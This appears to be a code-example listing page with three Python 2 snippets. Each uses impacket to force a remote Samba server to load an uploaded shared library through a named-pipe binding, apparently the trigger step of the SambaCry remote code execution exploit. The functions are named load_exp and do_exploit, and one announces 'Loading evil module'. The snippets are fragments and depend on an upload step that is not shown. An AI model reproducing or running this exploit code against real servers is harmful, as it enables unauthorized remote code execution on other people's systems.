예제 #1
0
 def load_exp(self):
   module = self.copy_lib(lib_name)
   print "[ " + emoji.emojize(':skull:') + " ] Loading evil module [ " +emoji.emojize(':skull:') +" ]"
   stringbinding = r'ncacn_np:%s[\pipe\%s]'% (self.rhost, module)
   stb = transport.DCERPCStringBinding(stringbinding)
   naddr = stb.get_network_address()
   rpctransport = transport.SMBTransport(naddr, filename = module, smb_connection = self.smb)
   dce = rpctransport.get_dce_rpc()
   dce.connect()
예제 #2
0
  def load_module(self, module):
    log("Trying to load module %s" % module)
    stringbinding = r'ncacn_np:%s[\pipe\%s]' % (self.target, module)
    sb = transport.DCERPCStringBinding(stringbinding)
    na = sb.get_network_address()
    rpctransport = transport.SMBTransport(na, filename = module, smb_connection = self.smb)
    dce = rpctransport.get_dce_rpc()

    try:
      dce.connect()
      return True
    except KeyboardInterrupt:
      print "Aborted."
      sys.exit(0)
    except:
      log("Error: %s" % str(sys.exc_info()[1]))
      return False
예제 #3
0
def do_exploit(module, rhost, smb_connection):
    log("Trying to load module %s" % module)
    stringbinding = r'ncacn_np:%s[\pipe\%s]' % (rhost, module)
    sb = transport.DCERPCStringBinding(stringbinding)
    na = sb.get_network_address()
    rpctransport = transport.SMBTransport(na,
                                          filename=module,
                                          smb_connection=smb_connection)
    dce = rpctransport.get_dce_rpc()

    try:
        dce.connect()
        return True
    except:
        pass  #不知道为什么一定会抛异常,但是我们不管

    return False